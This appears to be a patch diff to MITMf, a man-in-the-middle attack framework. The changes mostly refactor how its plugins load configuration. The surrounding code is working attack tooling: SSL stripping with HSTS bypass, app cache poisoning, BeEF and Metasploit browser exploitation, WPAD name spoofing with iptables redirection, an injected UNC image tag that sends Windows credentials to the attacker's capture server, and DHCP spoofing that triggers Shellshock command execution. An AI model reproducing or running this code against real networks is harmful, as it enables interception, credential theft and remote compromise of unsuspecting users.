    global RespondToName; RespondToName = config['RespondToName'].strip()
    RespondToName.split(",")
    global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip()
    DontRespondTo.split(",")
    global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip()
    DontRespondToName.split(",")
    HTMLToServe = ''
    if len(NumChal) is not 16:
        sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
    # Break out challenge for the hexidecimally challenged.  Also, avoid 2 different challenges by accident.
    global Challange; Challenge = ""
    for i in range(0,len(NumChal),2):
        Challenge += NumChal[i:i+2].decode("hex")
    #Cli options.
    global OURIP; OURIP = ip_address
--- a/libs/sslstrip/URLMonitor.py
+++ b/libs/sslstrip/URLMonitor.py
@ -18,7 +18,6 @@
 import re, os
 import logging
 from configobj import ConfigObj
 class URLMonitor:    
@ -44,12 +43,7 @@ class URLMonitor:
        self.redirects          = []
        self.faviconReplacement = False
        self.hsts               = False
-
+        self.hsts_config        = None 
        hsts_config = ConfigObj("./config/hsts_bypass.cfg")
        for k,v in hsts_config.items():
            self.sustitucion[k] = v
            self.real[v] = k
    def isSecureLink(self, client, url):
        for expression in URLMonitor.javascriptTrickery:
@ -138,9 +132,19 @@ class URLMonitor:
            self.strippedURLs.add((client, url))
            self.strippedURLPorts[(client, url)] = int(port)
-    def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
+    def setFaviconSpoofing(self, faviconSpoofing):
        self.faviconSpoofing = faviconSpoofing
-        self.hsts = hstsbypass
+
    def setHstsBypass(self, hstsconfig):
        if hstsconfig:
            self.hsts = True
            self.hsts_config = hstsconfig
            for k,v in self.hsts_config.items():
                self.sustitucion[k] = v
                self.real[v] = k
    def setClientLogging(self, clientLogging):
        self.clientLogging = clientLogging
    def isFaviconSpoofing(self):
--- a/mitmf.py
+++ b/mitmf.py
@ -15,7 +15,7 @@ except:
    sys.exit("[-] user_agents library not installed!")
 try:
-    import configobj
+    from configobj import ConfigObj
 except:
    sys.exit("[-] configobj library not installed!")
@ -29,21 +29,23 @@ sergio_version = "0.2.1"
 if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
    #add MITMf options
    mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
    mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
    mgroup.add_argument("-i", "--interface", type=str,  metavar="interface" ,help="Interface to listen on")
    mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use")
    mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
    #add sslstrip options
-    sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library")
+    sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
    #sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
    sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
    slogopts = sgroup.add_mutually_exclusive_group()
    slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
    slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
    slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
    #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
    sgroup.add_argument("-i", "--interface", type=str, required=True,  metavar="interface" ,help="Interface to listen on")
    sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
    sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
    sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
    sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
    sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
    #Initialize plugins
    plugins = []
@ -69,6 +71,23 @@ if __name__ == "__main__":
    args = parser.parse_args()
    try:
        configfile = ConfigObj(args.configfile)
    except Exception, e:
        sys.exit("[-] Error parsing config file: " + str(e))
    config_args = configfile['MITMf']['args']
    if config_args:
        print "[*] Loading arguments from config file"
        for arg in config_args.split(' '):
            sys.argv.append(arg)
        args = parser.parse_args()
    if not args.interface:
        sys.exit("[-] -i , --interface argument is required")
    args.configfile = configfile #so we can pass the configobj down to all the plugins
    log_level = logging.__dict__[args.log_level.upper()]
    #Start logging 
@ -84,7 +103,7 @@ if __name__ == "__main__":
    print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
    if ('--responder' and '--wpad') in sys.argv:
        args.listen = 3141
-        print "[*] Listening on port 3141 since --wpad was passed"
+        print "[*] SSLstrip is now listening on port 3141 since --wpad was passed"
    load = []
    try:
@ -103,7 +122,7 @@ if __name__ == "__main__":
        from libs.sslstrip.StrippingProxy import StrippingProxy
        from libs.sslstrip.URLMonitor import URLMonitor
-        URLMonitor.getInstance().setValues(args.favicon, args.hsts)
+        URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
        CookieCleaner.getInstance().setEnabled(args.killsessions)
        ProxyPlugins.getInstance().setPlugins(load)
--- a/plugins/AppCachePoison.py
+++ b/plugins/AppCachePoison.py
@ -1,15 +1,14 @@
-#
+
 # 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
 #######################################################################################################
 from plugins.plugin import Plugin
 from datetime import date
 from libs.sslstrip.URLMonitor import URLMonitor
 import logging
 import ConfigParser
 import re 
 import os.path
 import time
 import sys
 class AppCachePlugin(Plugin):
    name = "App Cache Poison"
@ -21,24 +20,15 @@ class AppCachePlugin(Plugin):
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.config_file = "./config/app_cache_poison.cfg"
        self.config = None
        self.mass_poisoned_browsers = []
        self.urlMonitor = URLMonitor.getInstance()
        try:
            self.config = options.configfile['AppCachePoison']
        except Exception, e:
            sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
        print "[*] App Cache Poison plugin online"
        self.createTamperer(self.config_file)
    def parseConfig(self, configFile):
        config = ConfigParser.ConfigParser()
        config.read(configFile)
        readConfig = config._sections
        readConfig.update(config.defaults())
        return readConfig
    def createTamperer(self, configFile):
        logging.debug("Reading tamper config file: %s"  % (configFile))
        self.config = self.parseConfig(configFile)
    def handleResponse(self, request, data):
@ -55,12 +45,12 @@ class AppCachePlugin(Plugin):
        urls = self.urlMonitor.getRedirectionSet(url)
-        (s,element,url) = self.getSectionForUrls(urls)
+        (name,s,element,url) = self.getSectionForUrls(urls)
-        if not s:
+        if s is False:
          data = self.tryMassPoison(url, data, headers, req_headers, ip)
          return {'request': request, 'data': data}
-        logging.debug("Found URL %s in section %s" % (url, s['__name__']))
+        logging.debug("Found URL %s in section %s" % (url, name))
        p = self.getTemplatePrefix(s)
        if element == 'tamper':
          logging.debug("Poisoning tamper URL with template %s" % (p))
@ -175,15 +165,16 @@ class AppCachePlugin(Plugin):
            for i in self.config:
              if isinstance(self.config[i], dict): #section
                section = self.config[i]
                name = i
                if section.get('tamper_url',False) == url:
-                  return (section, 'tamper',url)
+                  return (name, section, 'tamper',url)
                if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
-                  return (section, 'tamper',url)
+                  return (name, section, 'tamper',url)
                if section.get('manifest_url',False) == url:
-                  return (section, 'manifest',url)
+                  return (name, section, 'manifest',url)
                if section.get('raw_url',False) == url:
-                  return (section, 'raw',url)
+                  return (name, section, 'raw',url)
-        return (False,'',urls.copy().pop())
+        return (None, False,'',urls.copy().pop())
--- a/plugins/BeefAutorun.py
+++ b/plugins/BeefAutorun.py
@ -9,11 +9,6 @@ import json
 import threading
 import libs.beefapi as beefapi
 try:
    from configobj import ConfigObj
 except:
    sys.exit('[-] configobj library not installed!')
 requests_log = logging.getLogger("requests")  #Disables "Starting new HTTP Connection (1)" log message
 requests_log.setLevel(logging.WARNING)
@ -27,8 +22,15 @@ class BeefAutorun(Inject, Plugin):
 	def initialize(self, options):
 		self.options = options
-		beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF']
+		try:
-		userconfig = ConfigObj("./config/beefautorun.cfg")
+			beefconfig = options.configfile['MITMf']['BeEF']
 		except Exception, e:
 			sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
 		try:
 			userconfig = options.configfile['BeEFAutorun']
 		except Exception, e:
 			sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
 		self.Mode = userconfig['mode']
 		self.All_modules = userconfig["ALL"]
--- a/plugins/CacheKill.py
+++ b/plugins/CacheKill.py
@ -2,7 +2,7 @@ from plugins.plugin import Plugin
 class CacheKill(Plugin):
-    name = "CacheKill Plugin"
+    name = "CacheKill"
    optname = "cachekill"
    desc = "Kills page caching by modifying headers"
    implements = ["handleHeader", "connectionMade"]
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@ -88,7 +88,7 @@ class FilePwn(Plugin):
        #NOT USED NOW
        #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
-        self.userConfig      = ConfigObj("./config/filepwn.cfg")
+        self.userConfig      = options.configfile['FilePwn']
        self.FileSizeMax     = self.userConfig['targets']['ALL']['FileSizeMax']
        self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
        self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Er
 from scapy.all import get_if_addr
 import time
 import re
 import sys
 import argparse
 from plugins.plugin import Plugin
 from plugins.CacheKill import CacheKill
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@ -9,7 +9,6 @@ import sys
 import logging
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
 from scapy.all import get_if_addr
 from configobj import ConfigObj
 requests_log = logging.getLogger("requests")  #Disables "Starting new HTTP Connection (1)" log message
 requests_log.setLevel(logging.WARNING)
@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin):
        self.options      = options
        self.sploited_ips = []  #store ip of pwned or not vulnerable clients so we don't re-exploit
-        msfcfg       = ConfigObj('./config/mitmf.cfg')['Metasploit']
+        try:
-        self.javacfg = ConfigObj('./config/javapwn.cfg')
+            msfcfg       = options.configfile['MITMf']['Metasploit']
        except Exception, e:
            sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
        try:
            self.javacfg = options.configfile['JavaPwn']
        except Exception, e:
            sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
        self.msfport = msfcfg['msfport']
        self.rpcip   = msfcfg['rpcip']
--- a/plugins/Responder.py
+++ b/plugins/Responder.py
@ -23,6 +23,11 @@ class Responder(Plugin):
        if os.geteuid() != 0:
            sys.exit("[-] Responder plugin requires root privileges")
        try:
            config = options.configfile['Responder']
        except Exception, e:
            sys.exit('[-] Error parsing config for Responder: ' + str(e))
        try:
            self.ip_address = get_if_addr(options.interface)
            if self.ip_address == "0.0.0.0":
@ -32,16 +37,16 @@ class Responder(Plugin):
        print "[*] Responder plugin online"
        DnsCache.getInstance().setCustomAddress(self.ip_address)
-        DnsCache.getInstance().setCustomRes('wpad', self.ip_address)
+
-        DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address)
+        for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
-        DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address)
+            DnsCache.getInstance().setCustomRes(name, self.ip_address)
        if '--spoof' not in sys.argv:
            print '[*] Setting up iptables'
            os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
            os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
-        t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address))
+        t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
        t.setDaemon(True)
        t.start()
--- a/plugins/SMBAuth.py
+++ b/plugins/SMBAuth.py
@ -1,5 +1,9 @@
 from plugins.plugin import Plugin
 from plugins.Inject import Inject
 import sys
 import logging
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
 from scapy.all import get_if_addr
 class SMBAuth(Inject, Plugin):
@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin):
        Inject.initialize(self, options)
        self.target_ip = options.host
        self.html_payload = self._get_data()
        if self.target_ip is None:
            try:
                self.target_ip = get_if_addr(options.interface)
                if self.target_ip == "0.0.0.0":
                    sys.exit("[-] Interface %s does not have an IP address" % options.interface)
            except Exception, e:
                sys.exit("[-] Error retrieving interface IP address: %s" % e)
        print "[*] SMBAuth plugin online"
    def add_options(self, options):
-        options.add_argument("--host", type=str, help="The ip address of your capture server")
+        options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
    def _get_data(self):
        return '<img src=\"\\\\%s\\image.jpg\">'\
--- a/plugins/SSLstrip+.py
+++ b/plugins/SSLstrip+.py
@ -0,0 +1,20 @@
 from plugins.plugin import Plugin
 from libs.sslstrip.URLMonitor import URLMonitor
 import sys
 class HSTSbypass(Plugin):
 	name    = 'SSLstrip+'
 	optname = 'hsts'
 	desc    = 'Enables SSLstrip+ for partial HSTS bypass'
 	has_opts = False
 	def initialize(self, options):
 		self.options = options
 		try:
 			config = options.configfile['SSLstrip+']
 		except Exception, e:
 			sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
 		print "[*] SSLstrip+ plugin online"
 		URLMonitor.getInstance().setHstsBypass(config)
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@ -20,7 +20,6 @@ from base64 import b64decode
 from urllib import unquote
 import binascii
 import random
 from configobj import ConfigObj
 class Spoof(Plugin):
@ -93,7 +92,7 @@ class Spoof(Plugin):
            self.rand_number = []
            self.dhcp_dic = {}
-            self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
+            self.dhcpcfg = options.configfile['Spoof']['DHCP']
            thread_target = self.dhcp_sniff
            thread_args = ()
@ -109,9 +108,9 @@ class Spoof(Plugin):
            print "[*] DNS Tampering enabled"
            if self.dns:
-                self.dnscfg = ConfigObj("./config/dns.cfg")
+                self.dnscfg = options.configfile['Spoof']['DNS']
-            self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
+            self.hstscfg = options.configfile['SSLstrip+']
            if not self.manualiptables:
                os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
@ -334,7 +333,7 @@ class Spoof(Plugin):
        group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
        group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
-        options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
+        options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
        options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')